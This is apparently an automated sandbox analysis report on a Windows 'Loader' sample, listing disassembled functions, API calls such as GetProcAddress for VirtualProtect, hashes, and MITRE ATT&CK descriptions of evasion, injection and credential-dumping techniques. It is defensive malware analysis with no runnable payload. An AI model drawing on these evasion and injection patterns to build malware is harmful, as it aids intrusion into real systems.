Instruction ID: c9010006ce8fdacac2cbacb2e4c16478a99b051d9e320c3cd2a3323e0d169b55
Opcode Fuzzy Hash: c3dd1d8f25f4f9f6eb8a58d67c4bf423468c3cbcab7a7dddca57f637f2b7efce
Instruction Fuzzy Hash: 6941077110C7C18ED325DB28C85879BBFE1AB92314F084A9DE1E44B3D6C7BA8549C767

Function 00430499 Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 004304A3
VariantInit.OLEAUT32 ref: 004304B6

Strings

K, xrefs: 004304F9
N, xrefs: 0043050D
x, xrefs: 004304EF
s, xrefs: 00430503
o, xrefs: 00430517
z, xrefs: 004304DB
y, xrefs: 0043052B
B, xrefs: 00430521
~, xrefs: 004304D1
i, xrefs: 0043053F
}, xrefs: 004304E5
F, xrefs: 00430535

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Variant$ClearInit
String ID: B$F$K$N$i$o$s$x$y$z$}$~
API String ID: 2610073882-3505400394
Opcode ID: 3052f8970ba9629e4158c01bdb956601dbca793be04501bf74e504904e38b9f2
Instruction ID: 30ff3320af5e735e53faadba885bc6125f47e2871842261cc0130826748e476f
Opcode Fuzzy Hash: 3052f8970ba9629e4158c01bdb956601dbca793be04501bf74e504904e38b9f2
Instruction Fuzzy Hash: 6441293550C7C18ED325DB78884865EBFE16B92324F084B9DE0E5873E2D778950ACB57

Function 00CC1C10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00CC1C3B
GetFileSize.KERNEL32 ref: 00CC1CC3
CloseHandle.KERNEL32 ref: 00CC1CDF

Strings

CreateFileA, xrefs: 00CC1C2E

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: AddressCloseFileHandleProcSize
String ID: CreateFileA
API String ID: 2836222988-1429953656
Opcode ID: 6237227718ce5fe0910a5e84a9b52ebe94880feaf232378b30d445bcc20ab736
Instruction ID: 07df4c49a6e64b5a2eed55e6ba22de401b5ac359ba41a96432ac09578365c069
Opcode Fuzzy Hash: 6237227718ce5fe0910a5e84a9b52ebe94880feaf232378b30d445bcc20ab736
Instruction Fuzzy Hash: 7941A4B0D082499FDB00EFA9D4987AEBBF0EF49314F04852DE899AB391D7749544CF92

Function 00CD6642 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00CD6751,00000000,00000000,00000000,00000000), ref: 00CD6703

Strings

api-ms-, xrefs: 00CD6699
ext-ms-, xrefs: 00CD66AD

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b4a804dc1340c5bf29362bb6abd50d21b3f14ceb7294178f68b9268adec2f03b
Instruction ID: b37d2abffe13f457b8cd396503f340c7f74600be9d9c66a2057b3f55231d799e
Opcode Fuzzy Hash: b4a804dc1340c5bf29362bb6abd50d21b3f14ceb7294178f68b9268adec2f03b
Instruction Fuzzy Hash: 8E210D36A01214A7C7319B66DC45B5E37B8DB417B4F150122FF15A7391EB30EE01D6E0

Function 00CCF1F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00CE5684,000000FF,?,00CCF2B9,00CCF1A0,?,00CCF355,00000000), ref: 00CCF22D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CCF23F
FreeLibrary.KERNEL32(00000000,?,?,00000000,00CE5684,000000FF,?,00CCF2B9,00CCF1A0,?,00CCF355,00000000), ref: 00CCF261

Strings

mscoree.dll, xrefs: 00CCF226
CorExitProcess, xrefs: 00CCF237

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a2d9dcd19b2448c5b8402dc9d7dd3bcc9ca4d6784d8f3e26b924ce624c12927d
Instruction ID: 51fe5f837b2f135867c6f83b3ae652e277899cee35f8cb93577663868d64b91e
Opcode Fuzzy Hash: a2d9dcd19b2448c5b8402dc9d7dd3bcc9ca4d6784d8f3e26b924ce624c12927d
Instruction Fuzzy Hash: CE01A235940699AFDB119B54DC49FAEBBB9FB04B55F040639F821A62D0DB749900CA80

Function 00CE2E9C Relevance: 7.8, APIs: 5, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ca64bab4b3ac8d90eed5d5300d1ffe76d2d69cc22fbe1bc8cf594d2e6b99d49
Instruction ID: 0c42690a5293a3ac0271bf4a51ba46008a5e67c5c317d6596c9e33a8351006d6
Opcode Fuzzy Hash: 7ca64bab4b3ac8d90eed5d5300d1ffe76d2d69cc22fbe1bc8cf594d2e6b99d49
Instruction Fuzzy Hash: 78B11371A042C9AFDB11DFAAC885BBEBBB1BF45310F144159E9259B392C770AF41CB60

Function 00CC20C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00CC20E6
GetProcAddress.KERNEL32 ref: 00CC20FE

Strings

kernel32.dll, xrefs: 00CC20DD
FreeConsole, xrefs: 00CC20F1

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: FreeConsole$kernel32.dll
API String ID: 1646373207-2564406000
Opcode ID: fbf3160ece114f23fb85a298d1a2b9de3ebb701aa0e1935167f5873a53caf2f6
Instruction ID: 31b758787dead4bbb77bf84c1d3ab0062769d49b75bff57ce21389132b9ea46d
Opcode Fuzzy Hash: fbf3160ece114f23fb85a298d1a2b9de3ebb701aa0e1935167f5873a53caf2f6
Instruction Fuzzy Hash: 990166749042489FCB40EFB8D98579DBBF4AB48300F41856AE849DB351EB34A654DF82

Function 00CDF6B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CDF74C,00000000,?,00CF1E20,?,?,?,00CDF683,00000004,InitializeCriticalSectionEx,00CE90D4,00CE90DC), ref: 00CDF6BD
GetLastError.KERNEL32(?,00CDF74C,00000000,?,00CF1E20,?,?,?,00CDF683,00000004,InitializeCriticalSectionEx,00CE90D4,00CE90DC,00000000,?,00CD539C), ref: 00CDF6C7
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CDF6EF

Strings

api-ms-, xrefs: 00CDF6D4

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 75209266c5bbba266a79f34a1350649c008b64fa3943a6752b0e0c5d1370b9a9
Instruction ID: a6e6a6bdbff0a587afffd36758e777df52815c18fd78f530e4cd1be447f1fecf
Opcode Fuzzy Hash: 75209266c5bbba266a79f34a1350649c008b64fa3943a6752b0e0c5d1370b9a9
Instruction Fuzzy Hash: 4FE04831250245B7FB201B61EC4AF5C3BD5EF00B94F240031FB0DA85F1DBA2DA52A584

Function 00CDD74E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00CDD7B1

Part of subcall function 00CD5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CD6FD5,?,00000000,-00000008), ref: 00CD5862

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CDDA03
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CDDA49
GetLastError.KERNEL32 ref: 00CDDAEC

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 53e6cbe35fda440bb33c8cf1bc6743ee7a952cb53d3a88454833468799c35e42
Instruction ID: 3f1b8f3fc431f1d241885f0922b159d14a88d26990f25db49c429096bb3fda57
Opcode Fuzzy Hash: 53e6cbe35fda440bb33c8cf1bc6743ee7a952cb53d3a88454833468799c35e42
Instruction Fuzzy Hash: 0BD16B75D042499FCF15CFA8D880AEDBBB9FF08314F28816AE56AEB351D730A941DB50

Function 00CDC96E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00CDC976

Part of subcall function 00CD5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CD6FD5,?,00000000,-00000008), ref: 00CD5862

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CDC9AE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CDC9CE

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 1bdc21112c7581d4e6c1718951d195e8f34b21c17eda9cdae0f1c6555959edcb
Instruction ID: 44a74750a3d50ddadf136801311ad7195afc80b53598e95685e62a35dbe60c8e
Opcode Fuzzy Hash: 1bdc21112c7581d4e6c1718951d195e8f34b21c17eda9cdae0f1c6555959edcb
Instruction Fuzzy Hash: 0911EDF2901A4B7FA72167BA5CC9D7F69ACDE843E43100027FA09A1344EE21CE01B5B0

Function 00CCA335 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CCA347
GetCurrentThreadId.KERNEL32 ref: 00CCA356
GetCurrentProcessId.KERNEL32 ref: 00CCA35F
QueryPerformanceCounter.KERNEL32(?), ref: 00CCA36C

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 41310779a6c5ecc8dc55aeaa54b0bfbfcdf6f0d630f502492cdebec27cc5a48f
Instruction ID: f33570a07a3acbabb6eb70d5581a6b9067d868c49435c9d1e475b56a06e03d0d
Opcode Fuzzy Hash: 41310779a6c5ecc8dc55aeaa54b0bfbfcdf6f0d630f502492cdebec27cc5a48f
Instruction Fuzzy Hash: 79F06274D1024DEBCB00EBB4DA89A9EBBF8FF1C244B9159A5A412EB150E730AB449F51

Function 00CDA126 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00CCF809,?,?,?,00000055,?,-00000050,?,?,?), ref: 00CDA1E5
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00CCF809,?,?,?,00000055,?,-00000050,?,?), ref: 00CDA21C

Strings

utf8, xrefs: 00CDA2EE

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: 6519d8649561bd0ddf2f43812fc5e2234c0bbc46080a7a6d51bbb08e8e3c1c37
Instruction ID: 69bcb6ecc8bc961f5dda2b8cd72b25758425dedc841c6775f251907defd2903f
Opcode Fuzzy Hash: 6519d8649561bd0ddf2f43812fc5e2234c0bbc46080a7a6d51bbb08e8e3c1c37
Instruction Fuzzy Hash: 5E51D471600705BADB25AB71CC42BBA73A9EF44700F14042BFB599B391EB70EE4096A7

Function 00CD5170 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00CD5071,?,?,00000000,00000000,00000000,?), ref: 00CD5195

Strings

MOC, xrefs: 00CD51A7
RCC, xrefs: 00CD51AF

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 9884ccd223d69b7c91230ef554538abd5491e0108e74ea868c8098adfb0b72f8
Instruction ID: d3be2a93a58237ddd89be69764adb2e7e60903885c7640748034030d17a2f5af
Opcode Fuzzy Hash: 9884ccd223d69b7c91230ef554538abd5491e0108e74ea868c8098adfb0b72f8
Instruction Fuzzy Hash: 06418972900609AFCF15CF98CD81AEEBBB5FF08304F18805AFA24A7311D335AA50DB51

Function 0042F394 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F3A8
VariantInit.OLEAUT32 ref: 0042F3BA

Strings

<, xrefs: 0042F395

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Variant$ClearInit
String ID: <
API String ID: 2610073882-4251816714
Opcode ID: bad2be2dcfe1c31b12466c129fa1573cb1ba6cf6e70ac72a3dd25af1e62a9899
Instruction ID: 36de878388d46f0b64cd47425884e603f8c16ae8beab8166c1c18797f8568c08
Opcode Fuzzy Hash: bad2be2dcfe1c31b12466c129fa1573cb1ba6cf6e70ac72a3dd25af1e62a9899
Instruction Fuzzy Hash: D7414D21108BC18FD335CF3C8898647BFE06B16214F484FADD0E64B7D6D364A20AC796

Function 004323FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00432442
GetSystemMetrics.USER32 ref: 00432451

Strings

, xrefs: 004324FF

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 8ac0c0dd36d85f38f7ff20037301531bac82221c30a33fa984e21204b95f3e2f
Instruction ID: f9e283a9bed4f101d53c19740253f78c7c5a39bcd22ec5d74df376b4fb69552d
Opcode Fuzzy Hash: 8ac0c0dd36d85f38f7ff20037301531bac82221c30a33fa984e21204b95f3e2f
Instruction Fuzzy Hash: 5931A1B49143148FDB00EF78DA8560EBBF4BB89304F51452EE898DB360D3B4A948CB82

Function 00CC1DB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00CC1E6E

Strings

VirtualProtect, xrefs: 00CC1E61
@, xrefs: 00CC1EB7

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: AddressProc
String ID: @$VirtualProtect
API String ID: 190572456-29487290
Opcode ID: b92ad4e47759c0578fb79c96feb478984cea38a99527a57465ff8cd30855b795
Instruction ID: ac1913e113e58ebd1cd30228865e810d141904fd9748f2118573445a7401eebe
Opcode Fuzzy Hash: b92ad4e47759c0578fb79c96feb478984cea38a99527a57465ff8cd30855b795
Instruction Fuzzy Hash: 7341D0B0900208DFCB04DFA9D998B9EBBF0FF08344F118459E858AB341D775A944CF82

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
